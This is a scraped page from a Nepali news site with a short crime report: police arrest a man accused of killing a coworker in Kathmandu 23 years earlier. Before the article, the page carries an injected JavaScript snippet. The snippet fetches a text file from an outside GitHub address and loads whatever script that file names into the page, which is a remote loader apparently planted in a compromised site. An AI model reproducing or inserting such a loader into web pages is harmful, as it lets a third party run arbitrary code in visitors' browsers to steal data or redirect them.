;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); आफ्नै सहकर्मीको हत्या गरी फरार अभियुक्त २३ वर्ष पछि पक्राउ – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • आफ्नै सहकर्मीको हत्या गरी फरार अभियुक्त २३ वर्ष पछि पक्राउ
दुर्घटना/अपराध

आफ्नै सहकर्मीको हत्या गरी फरार अभियुक्त २३ वर्ष पछि पक्राउ

कात्तिक १९,

काठमाडौं । आफ्नै सहकर्मीको हत्या गरी फरार रहेका अभियुक्तलाई २३ वर्ष पछि प्रहरीले पक्राउ गरेको छ । गत २०५४ साल कात्तिक १६ गते काठमाडौं महानगरपालिक वडा नं ८ जयबागेश्वरी स्थित निर्माणेश्वर मन्दिर नजिक  काभ्रे जिल्ला पनौती घर बताउने अंन्दाजी १७/१८ वर्षाका श्याम खड्कालाई प्रहरीले बुधबार पक्राउ गरेको जानकारी दिएको छ ।

उनले आफ्नै सहकर्मी प्रतिबादी ध्रुव भनीने मानकाजी श्रेष्ठले हत्या गरी फरार रहेको थिए । उनले ध्रुव भनीने मानकाजी श्रेष्ठको नाममा काठमाण्डौं जिल्ला अदालत बबरमहल, काठमाण्डौंबाट गत २०७४ कात्तिक २८ गते वारेण्ट समेत जारी भएको । निज प्रतिवादीलाई केन्द्रिय अनुसन्धान व्यूरोबाट खटिएको प्रहरी टोलिले आज (बुधबार) १९ गते  ललितपुर महानगरपालिका वडा नं. ५ थसीखेलबाट पक्राउ गरेको  हो ।

पक्राउ परेका उनीमाथि आवश्यक कारवाहीको लागि काठमाण्डौं जिल्ला अदालतमा पेश गरिएको प्रहरीले जानकारी दिएको छ ।

फेसबुक प्रतिक्रियाहरु